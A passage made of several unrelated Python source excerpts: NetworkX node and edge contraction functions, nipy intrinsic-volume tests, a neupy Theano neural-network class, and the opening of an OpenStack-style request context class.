                        if (u in b and v in c) or (u in c and v in b))
            return {'weight': sum(d.get('weight', 1) for d in edgedata)}
    # Ordered pairs for directed quotients, unordered pairs otherwise.
    block_pairs = permutations(H, 2) if H.is_directed() else combinations(H, 2)
    # In a multigraph, add one edge in the quotient graph for each edge
    # in the original graph.
    if H.is_multigraph():
        edges = chaini(((b, c, G.get_edge_data(u, v, default={}))
                        for u, v in product(b, c) if v in G[u])
                       for b, c in block_pairs if edge_relation(b, c))
    # In a simple graph, apply the edge data function to each pair of
    # blocks to determine the edge data attributes to apply to each edge
    # in the quotient graph.
    else:
        edges = ((b, c, edge_data(b, c)) for (b, c) in block_pairs
                 if edge_relation(b, c))
    H.add_edges_from(edges)
    # If requested by the user, relabel the nodes to be integers,
    # numbered in increasing order from zero in the same order as the
    # iteration order of ``partition``.
    if relabel:
        # Can't use nx.convert_node_labels_to_integers() here since we
        # want the order of iteration to be the same for backward
        # compatibility with the nx.blockmodel() function.
        labels = {b: i for i, b in enumerate(partition)}
        H = nx.relabel_nodes(H, labels)
    return H
def contracted_nodes(G, u, v, self_loops=True):
    """Returns the graph that results from contracting ``u`` and ``v``.
    Node contraction identifies the two nodes as a single node incident to any
    edge that was incident to the original two nodes.
    Parameters
    ----------
    G : NetworkX graph
       The graph whose nodes will be contracted.
    u, v : nodes
       Must be nodes in ``G``.
    self_loops : Boolean
       If this is ``True``, any edges joining ``u`` and ``v`` in ``G`` become
       self-loops on the new node in the returned graph.
    Returns
    -------
    Networkx graph
       A new graph object of the same type as ``G`` (leaving ``G`` unmodified)
       with ``u`` and ``v`` identified in a single node. The right node ``v``
       will be merged into the node ``u``, so only ``u`` will appear in the
       returned graph.
    Examples
    --------
    Contracting two nonadjacent nodes of the cycle graph on four nodes `C_4`
    yields the path graph (ignoring parallel edges)::
        >>> import networkx as nx
        >>> G = nx.cycle_graph(4)
        >>> M = nx.contracted_nodes(G, 1, 3)
        >>> P3 = nx.path_graph(3)
        >>> nx.is_isomorphic(M, P3)
        True
    See also
    --------
    contracted_edge
    quotient_graph
    Notes
    -----
    This function is also available as ``identified_nodes``.
    """
    H = G.copy()
    if H.is_directed():
        # Re-point v's incident edges at u, preserving each edge's data
        # dict.  Edges between u and v would become self-loops on u, so
        # they are dropped unless self_loops is True.
        in_edges = ((w, u, d) for w, x, d in G.in_edges(v, data=True)
                    if self_loops or w != u)
        out_edges = ((u, w, d) for x, w, d in G.out_edges(v, data=True)
                     if self_loops or w != u)
        new_edges = chain(in_edges, out_edges)
    else:
        # G.edges(v) yields v as the first endpoint, so w is always the
        # neighbour at the other end of the edge.
        new_edges = ((u, w, d) for x, w, d in G.edges(v, data=True)
                     if self_loops or w != u)
    # NOTE(review): ``H.node`` is the pre-2.0 NetworkX node-attribute API;
    # later releases renamed it to ``H.nodes``.
    v_data = H.node[v]
    H.remove_node(v)
    H.add_edges_from(new_edges)
    # Record the absorbed node's attribute dict on the surviving node so
    # no node data is lost by the contraction.
    if 'contraction' in H.node[u]:
        H.node[u]['contraction'][v] = v_data
    else:
        H.node[u]['contraction'] = {v: v_data}
    return H
identified_nodes = contracted_nodes
def contracted_edge(G, edge, self_loops=True):
    """Returns the graph obtained by contracting the given edge.

    Contracting an edge merges its two endpoints into one node, which
    inherits every edge that touched either endpoint.  A graph produced
    this way is called a *minor* of the original graph.

    Parameters
    ----------
    G : NetworkX graph
       The graph whose edge will be contracted.
    edge : tuple
       Must be a pair of nodes in ``G``.
    self_loops : Boolean
       If this is ``True``, any edges (including ``edge``) joining the
       endpoints of ``edge`` in ``G`` become self-loops on the new node in the
       returned graph.

    Returns
    -------
    Networkx graph
       A new graph of the same type as ``G`` (``G`` itself is untouched)
       in which the endpoints of ``edge`` have been merged.  The right
       node of ``edge`` is absorbed into the left one, so only the left
       endpoint survives in the result.

    Raises
    ------
    ValueError
       If ``edge`` is not an edge in ``G``.

    Examples
    --------
    Attempting to contract two nonadjacent nodes yields an error::
        >>> import networkx as nx
        >>> G = nx.cycle_graph(4)
        >>> nx.contracted_edge(G, (1, 3))
        Traceback (most recent call last):
          ...
        ValueError: Edge (1, 3) does not exist in graph G; cannot contract it
    Contracting two adjacent nodes in the cycle graph on *n* nodes yields the
    cycle graph on *n - 1* nodes::
        >>> import networkx as nx
        >>> C5 = nx.cycle_graph(5)
        >>> C4 = nx.cycle_graph(4)
        >>> M = nx.contracted_edge(C5, (0, 1), self_loops=False)
        >>> nx.is_isomorphic(M, C4)
        True

    See also
    --------
    contracted_nodes
    quotient_graph
    """
    # Guard: only an existing edge may be contracted.
    if not G.has_edge(*edge):
        message = ('Edge {0} does not exist in graph G; cannot contract'
                   ' it'.format(edge))
        raise ValueError(message)
    # Edge contraction is node contraction of the edge's endpoints.
    return contracted_nodes(G, *edge, self_loops=self_loops)
def blockmodel(G, partition, multigraph=False):
    """Returns a reduced graph built with the generalized block modeling
    technique.

    Blockmodeling collapses each block of the given node partition into a
    single node of the reduced graph.  Edges between blocks are derived
    from the edges of the original graph: with ``multigraph=False`` (the
    default) a single edge carries the summed edge weights between the
    two blocks (a weight of 1 per edge when the original graph is
    unweighted); with ``multigraph=True`` every original inter-block edge
    appears separately, keeping its edge data.

    Parameters
    ----------
    G : graph
        A networkx Graph or DiGraph
    partition : list of lists, or list of sets
        The partition of the nodes.  Must be non-overlapping.
    multigraph : bool, optional
        If True return a MultiGraph with the edge data of the original
        graph applied to each corresponding edge in the new graph.
        If False return a Graph with the sum of the edge weights, or a
        count of the edges if the original graph is unweighted.

    Returns
    -------
    blockmodel : a Networkx graph object

    Examples
    --------
    >>> G = nx.path_graph(6)
    >>> partition = [[0,1],[2,3],[4,5]]
    >>> M = nx.blockmodel(G,partition)

    References
    ----------
    .. [1] Patrick Doreian, Vladimir Batagelj, and Anuska Ferligoj
        "Generalized Blockmodeling",Cambridge University Press, 2004.

    Notes
    -----
    This function has been deprecated. Please use ``quotient_graph`` instead.
    """
    # quotient_graph treats create_using=None as "same type as G", which
    # matches the non-multigraph branch of the old implementation.
    template = nx.MultiGraph() if multigraph else None
    return nx.quotient_graph(G, partition, relabel=True,
                             create_using=template)
| |
import numpy as np
import numpy.linalg as L
import numpy.random as R
from nipy.testing import assert_equal, assert_almost_equal, dec
from nipy.algorithms.statistics import intvol, utils
def symnormal(p=10):
    """Return a random ``p`` x ``p`` symmetric matrix.

    Entries are drawn from the standard normal distribution and the
    matrix is symmetrised as ``(M + M.T) / sqrt(2)``.
    """
    draw = R.standard_normal((p, p))
    return (draw + draw.T) / np.sqrt(2)
def randorth(p=10):
    """
    A random orthogonal matrix.

    Built from the eigenvectors of a random symmetric Gaussian matrix.
    ``eigh`` is used rather than ``eig`` because it is specialised for
    symmetric input: it guarantees real, orthonormal eigenvectors even
    when eigenvalues are numerically (near-)degenerate, whereas the
    general-purpose ``eig`` does not.
    """
    A = symnormal(p)
    return L.eigh(A)[1]
def box(shape, edges):
    """Return an integer array of ``shape`` with ones inside the given box.

    Parameters
    ----------
    shape : tuple of int
        Shape of the output array.
    edges : sequence of (low, high) pairs
        One pair per axis; the half-open interval ``[low, high)`` is
        filled with ones along that axis.
    """
    data = np.zeros(shape)
    # Indexing must use a *tuple* of slices -- indexing with a list of
    # slices is an error in modern NumPy.
    sl = tuple(slice(lo, hi, 1) for lo, hi in edges)
    data[sl] = 1
    # np.int was removed from NumPy; the builtin int is its equivalent.
    return data.astype(int)
def randombox(shape):
    """
    Generate a random box, returning the box and the edge lengths
    """
    # randint's upper bound is exclusive, so shape[j] + 1 reproduces the
    # inclusive range of the removed numpy.random.random_integers API.
    edges = [R.randint(0, shape[j] + 1, size=(2,))
             for j in range(len(shape))]
    for j in range(len(shape)):
        edges[j].sort()
        if edges[j][0] == edges[j][1]:
            # Degenerate (empty) interval: fall back to a default box.
            # Floor division keeps the bound an int, so it remains a
            # valid slice endpoint under Python 3 (``/`` yields a float).
            edges[j][0] = 0
            edges[j][1] = shape[j] // 2 + 1
    return edges, box(shape, edges)
def elsym(edgelen, order=1):
    """
    Elementary symmetric polynomial of a given order

    Parameters
    ----------
    edgelen : sequence of numbers
        Values of the polynomial's variables.
    order : int
        Order of the polynomial; order 0 returns 1 by convention.
    """
    # itertools.combinations is the stdlib equivalent of the project's
    # utils.combinations helper.
    from itertools import combinations
    if order == 0:
        return 1
    total = 0
    for index_tuple in combinations(range(len(edgelen)), order):
        # np.product was removed in NumPy 2.0; np.prod is its replacement.
        total += np.prod([edgelen[i] for i in index_tuple])
    return total
def nonintersecting_boxes(shape):
    """
    The Lips's are supposed to be additive, so disjoint things
    should be additive. But, if they ALMOST intersect, different
    things get added to the triangulation.

    >>> b1 = np.zeros(40, np.int)
    >>> b1[:11] = 1
    >>> b2 = np.zeros(40, np.int)
    >>> b2[11:] = 1
    >>> (b1*b2).sum()
    0
    >>> c = np.indices((40,)).astype(np.float)
    >>> intvol.Lips1d(c, b1)
    10.0
    >>> intvol.Lips1d(c, b2)
    28.0
    >>> intvol.Lips1d(c, b1+b2)
    39.0

    The function creates two boxes such that
    the 'dilated' box1 does not intersect with box2.
    Additivity works in this case.
    """
    while True:
        edge1, box1 = randombox(shape)
        edge2, box2 = randombox(shape)
        # Grow box1 by one voxel on every side, clipped to the array
        # bounds; if even the grown box misses box2, the original pair
        # is safely separated.
        grown_edges = [[max(lo - 1, 0), min(hi + 1, axis_len)]
                       for (lo, hi), axis_len in zip(edge1, box1.shape)]
        grown_box1 = box(box1.shape, grown_edges)
        if not (grown_box1 * box2).any():
            return box1, box2, edge1, edge2
def test_mu3tet():
    # mu_3 (volume) of the right tetrahedron with unit legs is 1/6.
    expected = 1. / 6
    assert_equal(intvol.mu3_tet(0, 0, 0, 0, 1, 0, 0, 1, 0, 1), expected)
def test_mu2tri():
    # mu_2 (area) of the right triangle with unit legs is 1/2.
    expected = 1. / 2
    assert_equal(intvol.mu2_tri(0, 0, 0, 1, 0, 1), expected)
def test_mu1tri():
    # mu_1 of the unit right triangle: half its perimeter, 1 + sqrt(2)/2.
    expected = 1 + np.sqrt(2) / 2
    assert_equal(intvol.mu1_tri(0, 0, 0, 1, 0, 1), expected)
def test_mu2tet():
    # mu_2 of the unit right tetrahedron: half its surface area.
    expected = (3. / 2 + np.sqrt(3. / 4)) / 2
    assert_equal(intvol.mu2_tet(0, 0, 0, 0, 1, 0, 0, 1, 0, 1), expected)
def test_ec():
    # A single solid box has Euler characteristic 1 in any dimension.
    ec_funcs = {1: intvol.EC1d, 2: intvol.EC2d, 3: intvol.EC3d}
    for dim in range(1, 4):
        _, bx = randombox((40,) * dim)
        yield assert_almost_equal, ec_funcs[dim](bx), 1
def test_ec_disjoint():
    # The Euler characteristic is additive over well-separated regions.
    ec_funcs = {1: intvol.EC1d, 2: intvol.EC2d, 3: intvol.EC3d}
    for dim in range(1, 4):
        bx1, bx2, _, _ = nonintersecting_boxes((40,) * dim)
        ec = ec_funcs[dim]
        yield assert_almost_equal, ec(bx1 + bx2), ec(bx1) + ec(bx2)
def test_lips1_disjoint():
    # Lipschitz-Killing curvatures are additive over disjoint 1D boxes,
    # for intrinsic (c), random (d) and rotated intrinsic (e) coordinates.
    phi = intvol.Lips1d
    box1, box2, edge1, edge2 = nonintersecting_boxes((30,))
    # np.float / np.product were removed from NumPy; the builtin float
    # and np.prod are their replacements.
    c = np.indices((30,)).astype(float)
    d = np.random.standard_normal((10,)+(30,))
    U = randorth(p=6)[:1]
    e = np.dot(U.T, c.reshape((c.shape[0], np.prod(c.shape[1:]))))
    e.shape = (e.shape[0],) + c.shape[1:]
    yield assert_almost_equal, phi(c, box1 + box2), \
        phi(c, box1) + phi(c, box2)
    yield assert_almost_equal, phi(d, box1 + box2), \
        phi(d, box1) + phi(d, box2)
    yield assert_almost_equal, phi(e, box1 + box2), \
        phi(e, box1) + phi(e, box2)
    # A rotation of the coordinates should not change the measures.
    yield assert_almost_equal, phi(e, box1 + box2), phi(c, box1 + box2)
    # Compare against the closed form via elementary symmetric polynomials.
    yield assert_almost_equal, phi(e, box1 + box2), \
        (np.array([elsym([e[1]-e[0]-1 for e in edge1], i) for i in range(2)])+
         np.array([elsym([e[1]-e[0]-1 for e in edge2], i) for i in range(2)]))
@dec.slow
def test_lips2_disjoint():
    # Additivity of Lipschitz-Killing curvatures over disjoint 2D boxes.
    phi = intvol.Lips2d
    box1, box2, edge1, edge2 = nonintersecting_boxes((40,40))
    # np.float / np.product were removed from NumPy; the builtin float
    # and np.prod are their replacements.
    c = np.indices((40,40)).astype(float)
    d = np.random.standard_normal((40,40,40))
    U = randorth(p=6)[0:2]
    e = np.dot(U.T, c.reshape((c.shape[0], np.prod(c.shape[1:]))))
    e.shape = (e.shape[0],) + c.shape[1:]
    yield assert_almost_equal, phi(c, box1 + box2), phi(c, box1) + \
        phi(c, box2)
    yield assert_almost_equal, phi(d, box1 + box2), phi(d, box1) + \
        phi(d, box2)
    yield assert_almost_equal, phi(e, box1 + box2), phi(e, box1) + \
        phi(e, box2)
    # A rotation of the coordinates should not change the measures.
    yield assert_almost_equal, phi(e, box1 + box2), phi(c, box1 + box2)
    # Compare against the closed form via elementary symmetric polynomials.
    yield assert_almost_equal, phi(e, box1 + box2), \
        (np.array([elsym([e[1]-e[0]-1 for e in edge1], i) for i in range(3)]) +
         np.array([elsym([e[1]-e[0]-1 for e in edge2], i) for i in range(3)]))
@dec.slow
def test_lips3_disjoint():
    # Additivity of Lipschitz-Killing curvatures over disjoint 3D boxes.
    phi = intvol.Lips3d
    box1, box2, edge1, edge2 = nonintersecting_boxes((40,)*3)
    # np.float / np.product were removed from NumPy; the builtin float
    # and np.prod are their replacements.
    c = np.indices((40,)*3).astype(float)
    d = np.random.standard_normal((40,40,40,40))
    U = randorth(p=6)[0:3]
    e = np.dot(U.T, c.reshape((c.shape[0], np.prod(c.shape[1:]))))
    e.shape = (e.shape[0],) + c.shape[1:]
    yield assert_almost_equal, phi(c, box1 + box2), phi(c, box1) + phi(c, box2)
    yield assert_almost_equal, phi(d, box1 + box2), phi(d, box1) + phi(d, box2)
    yield assert_almost_equal, phi(e, box1 + box2), phi(e, box1) + phi(e, box2)
    # A rotation of the coordinates should not change the measures.
    yield assert_almost_equal, phi(e, box1 + box2), phi(c, box1 + box2)
    # Compare against the closed form via elementary symmetric polynomials.
    yield assert_almost_equal, phi(e, box1 + box2), \
        (np.array([elsym([e[1]-e[0]-1 for e in edge1], i) for i in range(4)]) +
         np.array([elsym([e[1]-e[0]-1 for e in edge2], i) for i in range(4)]))
def test_slices():
    # Slices have EC 1...
    e = intvol.EC3d
    p = intvol.Lips3d
    # np.int / np.float were removed from NumPy; the builtins int and
    # float are their replacements.
    m = np.zeros((40,)*3, int)
    D = np.indices(m.shape).astype(float)
    # A single voxel: EC 1, no higher-order measures.
    m[10,10,10] = 1
    yield assert_almost_equal, e(m), 1
    yield assert_almost_equal, p(D,m), [1,0,0,0]
    # A line segment of 4 voxels: EC 1, length 3.
    m = np.zeros((40,)*3, int)
    m[10,10:14,10] = 1
    yield assert_almost_equal, e(m), 1
    yield assert_almost_equal, p(D,m), [1,3,0,0]
    # A flat 4x6 rectangle: EC 1, half-perimeter 8, area 15.
    m = np.zeros((40,)*3, int)
    m[10,10:14,9:15] = 1
    yield assert_almost_equal, e(m), 1
    yield assert_almost_equal, p(D,m), [1,8,15,0]
| |
import time
import types
import theano
import theano.sparse
import theano.tensor as T
from neupy.utils import (AttributeKeyDict, asfloat, is_list_of_integers,
format_data, does_layer_accept_1d_feature)
from neupy.layers import BaseLayer, Output, Dropout, Combination
from neupy.layers.utils import generate_layers
from neupy.core.properties import ChoiceProperty
from neupy.layers.connections import LayerConnection, NetworkConnectionError
from neupy.network import errors
from .learning import SupervisedLearning
from .base import BaseNetwork
__all__ = ('ConstructableNetwork',)
def clean_layers(connection):
    """ Clean layers connections and transform them into one format.
    Also this function validates layers connections.

    Parameters
    ----------
    connection : list, tuple or object
        Layers connection in different formats.

    Returns
    -------
    object
        Cleaned layers connection.

    Raises
    ------
    NetworkConnectionError
        If the final layer is not an ``Output`` instance.
    """
    if is_list_of_integers(connection):
        connection = generate_layers(list(connection))

    if isinstance(connection, tuple):
        connection = list(connection)

    islist = isinstance(connection, list)
    if islist and isinstance(connection[0], BaseLayer):
        # Work on a copy: pop() below would otherwise mutate the list
        # object passed in by the caller.
        connection = list(connection)
        # Fold the flat layer list into a right-to-left chain of
        # LayerConnection objects.
        chain_connection = connection.pop()
        for layer in reversed(connection):
            chain_connection = LayerConnection(layer, chain_connection)
        connection = chain_connection

    if not isinstance(connection.output_layer, Output):
        raise NetworkConnectionError("Final layer must be Output class "
                                     "instance.")

    return connection
def create_input_variable(input_layer, variable_name):
    """ Create input variable based on input layer information.

    Parameters
    ----------
    input_layer : object
        The network's input layer; its dimensionality selects the type
        of the created Theano variable.
    variable_name : str
        Name for the created Theano variable.

    Returns
    -------
    Theano variable

    Raises
    ------
    ValueError
        If the layer's input is not 2, 3 or 4 dimensional.
    """
    dim_to_variable_type = {
        2: T.matrix,
        3: T.tensor3,
        4: T.tensor4,
    }

    if isinstance(input_layer, Combination):
        # NOTE(review): Combination layers are assumed to consume
        # 3-dimensional input -- confirm against the layer implementation.
        ndim = 3
    elif getattr(input_layer, 'ndim', None) is not None:
        # getattr with a default replaces the hasattr + "not x is None"
        # double lookup from the previous implementation.
        ndim = input_layer.ndim
    else:
        # Fall back to the dimensionality of the layer's weight.
        ndim = input_layer.weight.ndim

    if ndim not in dim_to_variable_type:
        raise ValueError("Layer's input needs to be 2, 3 or 4 dimensional. "
                         "Found {}".format(ndim))

    variable_type = dim_to_variable_type[ndim]
    return variable_type(variable_name)
def create_output_variable(error_function, variable_name):
    """ Create output variable based on error function.

    Parameters
    ----------
    error_function : function
        Error function; may carry an ``expected_dtype`` attribute that
        names the Theano variable type to use.
    variable_name : str
        Name for the created Theano variable.

    Returns
    -------
    Theano variable
    """
    # TODO: Solution is not user friendly. I need to find
    # better solution later.
    # Fall back to a matrix variable when the error function does not
    # declare an expected dtype.
    variable_type = getattr(error_function, 'expected_dtype', T.matrix)
    return variable_type(variable_name)
def find_input_layer(layers):
    """ Function checks list of layer and finds an input layer.

    Parameters
    ----------
    layers : iterative object
        Ordered list of layers.

    Returns
    -------
    BaseLayer instance or None
        The first layer that is not a dropout layer, or ``None`` when
        no such layer exists in the specified connection structure.
    """
    return next((layer for layer in layers
                 if not isinstance(layer, Dropout)), None)
class ErrorFunctionProperty(ChoiceProperty):
    """ Property that helps select error function from
    available or define a new one.
    Parameters
    ----------
    {ChoiceProperty.choices}
    {BaseProperty.default}
    {BaseProperty.required}
    """
    def __set__(self, instance, value):
        # Custom callables bypass ChoiceProperty's choice validation:
        # super(ChoiceProperty, self) resolves to ChoiceProperty's *parent*
        # in the MRO, deliberately skipping ChoiceProperty.__set__.
        if isinstance(value, types.FunctionType):
            return super(ChoiceProperty, self).__set__(instance, value)
        # Named choices go through the normal ChoiceProperty machinery.
        return super(ErrorFunctionProperty, self).__set__(instance, value)
    def __get__(self, instance, value):
        # Read the raw stored value without ChoiceProperty's key-to-value
        # mapping (again skipping ChoiceProperty in the MRO).
        founded_value = super(ChoiceProperty, self).__get__(instance, value)
        # Custom functions are returned as-is; named choices are resolved
        # through ChoiceProperty's lookup.
        if isinstance(founded_value, types.FunctionType):
            return founded_value
        return super(ErrorFunctionProperty, self).__get__(instance,
                                                          founded_value)
class ConstructableNetwork(SupervisedLearning, BaseNetwork):
    """ Class contains functionality that helps work with network that have
    constructable layers architecture.
    Parameters
    ----------
    connection : list, tuple or object
        Network architecture. That variables could be described in
        different ways. The simples one is a list or tuple that contains
        integers. Each integer describe layer input size. For example,
        ``(2, 4, 1)`` means that network will have 3 layers with 2 input
        units, 4 hidden units and 1 output unit. The one limitation of that
        method is that all layers automaticaly would with sigmoid actiavtion
        function. Other way is just a list of ``BaseLayer``` class
        instances. For example: ``[Tanh(2), Relu(4), Output(1)].
        And the most readable one is just layer pipeline
        ``Tanh(2) > Relu(4) > Output(1)``.
    error : {{'mse', 'rmse', 'mae', 'categorical_crossentropy', \
    'binary_crossentropy'}} or function
        Function that calculate prediction error.
        Defaults to ``mse``.
        * ``mae`` - Mean Absolute Error.
        * ``mse`` - Mean Squared Error.
        * ``rmse`` - Root Mean Squared Error.
        * ``msle`` - Mean Squared Logarithmic Error.
        * ``rmsle`` - Root Mean Squared Logarithmic Error.
        * ``categorical_crossentropy`` - Categorical cross entropy.
        * ``binary_crossentropy`` - Binary cross entropy.
        * Custom function that accept two mandatory arguments.
          The first one is expected value and the second one is
          predicted value. Example: ``custom_func(expected, predicted)``
    {BaseNetwork.step}
    {BaseNetwork.show_epoch}
    {BaseNetwork.shuffle_data}
    {BaseNetwork.epoch_end_signal}
    {BaseNetwork.train_end_signal}
    {Verbose.verbose}
    Attributes
    ----------
    {BaseNetwork.errors}
    {BaseNetwork.train_errors}
    {BaseNetwork.validation_errors}
    {BaseNetwork.last_epoch}
    """
    # Maps error-name strings to implementations; custom callables pass
    # straight through (see ErrorFunctionProperty above).
    error = ErrorFunctionProperty(default='mse', choices={
        'mae': errors.mae,
        'mse': errors.mse,
        'rmse': errors.rmse,
        'msle': errors.msle,
        'rmsle': errors.rmsle,
        'binary_crossentropy': errors.binary_crossentropy,
        'categorical_crossentropy': errors.categorical_crossentropy,
    })
    def __init__(self, connection, *args, **kwargs):
        # Normalise/validate the architecture, then cache convenient views
        # of it: all layers, all-but-output, first non-dropout (input), and
        # the final Output layer.
        self.connection = clean_layers(connection)
        self.all_layers = list(self.connection)
        self.layers = self.all_layers[:-1]
        self.input_layer = find_input_layer(self.layers)
        self.hidden_layers = self.layers[1:]
        self.output_layer = self.all_layers[-1]
        # Layer weights must exist before Theano variables are built below.
        self.init_layers()
        super(ConstructableNetwork, self).__init__(*args, **kwargs)
        self.logs.message("THEANO", "Initializing Theano variables and "
                                    "functions.")
        start_init_time = time.time()
        # Symbolic placeholders for the network's input and target output.
        self.variables = AttributeKeyDict(
            network_input=create_input_variable(
                self.input_layer, variable_name='x'
            ),
            network_output=create_output_variable(
                self.error, variable_name='y'
            ),
        )
        self.methods = AttributeKeyDict()
        self.init_variables()
        self.init_methods()
        finish_init_time = time.time()
        self.logs.message("THEANO", "Initialization finished sucessfully. "
                          "It took {:.2f} seconds"
                          "".format(finish_init_time - start_init_time))
    def init_variables(self):
        """ Initialize Theano variables.
        """
        network_input = self.variables.network_input
        network_output = self.variables.network_output
        # Build two symbolic forward passes: ``prediction`` skips Dropout
        # layers (inference path) while ``train_prediction`` applies every
        # layer including Dropout (training path).
        train_prediction = prediction = network_input
        for layer in self.layers:
            if not isinstance(layer, Dropout):
                prediction = layer.output(prediction)
                layer.prediction = prediction
            train_prediction = layer.output(train_prediction)
        self.variables.update(
            step=theano.shared(name='step', value=asfloat(self.step)),
            epoch=theano.shared(name='epoch', value=asfloat(self.last_epoch)),
            prediction_func=prediction,
            train_prediction_func=train_prediction,
            # Training error uses the dropout path; validation the clean one.
            error_func=self.error(network_output, train_prediction),
            validation_error_func=self.error(network_output, prediction),
        )
    def init_methods(self):
        """ Initialize all methods that needed for prediction and
        training procedures.
        """
        network_input = self.variables.network_input
        network_output = self.variables.network_output
        # Compile the symbolic graphs into callable Theano functions.
        self.methods.predict_raw = theano.function(
            inputs=[self.variables.network_input],
            outputs=self.variables.prediction_func
        )
        self.methods.train_epoch = theano.function(
            inputs=[network_input, network_output],
            outputs=self.variables.error_func,
            updates=self.init_train_updates(),
        )
        self.methods.prediction_error = theano.function(
            inputs=[network_input, network_output],
            outputs=self.variables.validation_error_func
        )
    def init_layers(self):
        """ Initialize layers in the same order as they were list in
        network initialization step.
        """
        for layer in self.layers:
            layer.initialize()
    def init_train_updates(self):
        """ Initialize train function update in Theano format that
        would be trigger after each training epoch.
        """
        updates = []
        for layer in self.layers:
            updates.extend(self.init_layer_updates(layer))
        return updates
    def init_layer_updates(self, layer):
        """ Initialize train function update in Theano format that
        would be trigger after each training epoch for each layer.
        Parameters
        ----------
        layer : object
            Any layer that inherit from BaseLayer class.
        Returns
        -------
        list
            Update that excaptable by ``theano.function``. There should be
            a lits that contains tuples with 2 elements. First one should
            be parameter that would be updated after epoch and the second one
            should update rules for this parameter. For example parameter
            could be a layer's weight and bias.
        """
        updates = []
        for parameter in layer.parameters:
            updates.extend(self.init_param_updates(layer, parameter))
        return updates
    def init_param_updates(self, layer, parameter):
        """ Initialize parameter updates.
        Parameters
        ----------
        layer : object
            Any layer that inherit from BaseLayer class.
        parameter : object
            Usualy it is a weight or bias.
        Returns
        -------
        list
            List of updates related to the specified parameter.
            Base class has no update rules; training algorithms are
            expected to override this hook in subclasses.
        """
        return []
    def format_input_data(self, input_data):
        """ Input data format is depence on the input layer
        structure.
        Parameters
        ----------
        input_data : array-like or None
        Returns
        -------
        array-like or None
            Function returns formatted array.  ``None`` input passes
            through unchanged (implicitly returns ``None``).
        """
        if input_data is not None:
            is_feature1d = does_layer_accept_1d_feature(self.input_layer)
            return format_data(input_data, is_feature1d)
    def format_target_data(self, target_data):
        """ Target data format is depence on the output layer
        structure.
        Parameters
        ----------
        target_data : array-like or None
        Returns
        -------
        array-like or None
            Function returns formatted array.  ``None`` input passes
            through unchanged (implicitly returns ``None``).
        """
        if target_data is not None:
            is_feature1d = does_layer_accept_1d_feature(self.output_layer)
            return format_data(target_data, is_feature1d)
    def prediction_error(self, input_data, target_data):
        """ Calculate prediction accuracy for input data.
        Parameters
        ----------
        input_data : array-like
        target_data : array-like
        Returns
        -------
        float
            Prediction error.
        """
        return self.methods.prediction_error(
            self.format_input_data(input_data),
            self.format_target_data(target_data)
        )
    def predict_raw(self, input_data):
        """ Make raw prediction without final layer postprocessing step.
        Parameters
        ----------
        input_data : array-like
        Returns
        -------
        array-like
        """
        input_data = self.format_input_data(input_data)
        return self.methods.predict_raw(input_data)
    def predict(self, input_data):
        """ Return prediction results for the input data. Output result also
        include postprocessing step related to the final layer that
        transform output to convenient format for end-use.
        Parameters
        ----------
        input_data : array-like
        Returns
        -------
        array-like
        """
        raw_prediction = self.predict_raw(input_data)
        return self.output_layer.output(raw_prediction)
    def on_epoch_start_update(self, epoch):
        """ Function would be trigger before run all training procedure
        related to the current epoch.
        Parameters
        ----------
        epoch : int
            Current epoch number.
        """
        super(ConstructableNetwork, self).on_epoch_start_update(epoch)
        # Keep the shared Theano epoch counter in sync with training.
        self.variables.epoch.set_value(epoch)
    def train(self, input_train, target_train, input_test=None,
              target_test=None, *args, **kwargs):
        """ Trains neural network.
        All four data arguments are formatted for the network's input and
        output layers before delegating to the base implementation.
        """
        return super(ConstructableNetwork, self).train(
            self.format_input_data(input_train),
            self.format_target_data(target_train),
            self.format_input_data(input_test),
            self.format_target_data(target_test),
            *args, **kwargs
        )
    def train_epoch(self, input_train, target_train):
        """ Trains neural network over one epoch.
        Parameters
        ----------
        input_data : array-like
        target_data : array-like
        Returns
        -------
        float
            Prediction error.
        """
        return self.methods.train_epoch(input_train, target_train)
    def architecture(self):
        """ Shows network's architecture in the terminal if
        ``verbose`` parameter is equal to ``True``.
        """
        self.logs.title("Network's architecture")
        for i, layer in enumerate(self.all_layers, start=1):
            self.logs.write("{:>3}. {}".format(i, str(layer)))
        self.logs.newline()
    def __repr__(self):
        return "{}({}, {})".format(self.class_name(), self.connection,
                                   self._repr_options())
| |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import access
from keystoneclient.auth.identity import access as access_plugin
from keystoneclient.auth.identity import v3
from keystoneclient.auth import token_endpoint
from oslo_config import cfg
from oslo_context import context
from chef_validator.common import log as logging
from oslo_middleware import request_id as oslo_request_id
from oslo_utils import importutils
import oslo_messaging
import six
from chef_validator.common import exception
from chef_validator.common.i18n import _LE
from chef_validator.common import wsgi
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class RequestContext(context.RequestContext):
    """
    Stores information about the security context under which the user
    accesses the system, as well as additional request information.
    """

    def __init__(self, auth_token=None, username=None, password=None,
                 aws_creds=None, tenant=None, user_id=None,
                 tenant_id=None, auth_url=None, roles=None, is_admin=None,
                 read_only=False, show_deleted=False,
                 overwrite=True, trust_id=None, trustor_user_id=None,
                 request_id=None, auth_token_info=None, region_name=None,
                 auth_plugin=None, **kwargs):
        """
        :param overwrite: Set to False to ensure that the greenthread local
            copy of the index is not overwritten.
        :param kwargs: Extra arguments that might be present, but we ignore
            because they possibly came in from older rpc messages.
        """
        # NOTE(review): `overwrite` is accepted but never forwarded to the
        # base class -- confirm whether it should be passed through.
        super(RequestContext, self).__init__(
            auth_token=auth_token,
            user=username,
            tenant=tenant,
            is_admin=is_admin,
            read_only=read_only,
            show_deleted=show_deleted,
            request_id=request_id
        )
        self.username = username
        self.user_id = user_id
        self.password = password
        self.region_name = region_name
        self.aws_creds = aws_creds
        self.tenant_id = tenant_id
        self.auth_token_info = auth_token_info
        self.auth_url = auth_url
        self.roles = roles or []
        # Caches populated lazily by code outside this class.
        self._session = None
        self._clients = None
        self.trust_id = trust_id
        self.trustor_user_id = trustor_user_id
        # Either injected (e.g. by keystonemiddleware) or created on
        # demand through the `auth_plugin` property below.
        self._auth_plugin = auth_plugin
        self.is_admin = is_admin

    def to_dict(self):
        """Serializes the context into a plain dict (e.g. for RPC)."""
        user_idt = '{user} {tenant}'.format(user=self.username or '-',
                                            tenant=self.tenant or '-')
        return {'auth_token': self.auth_token,
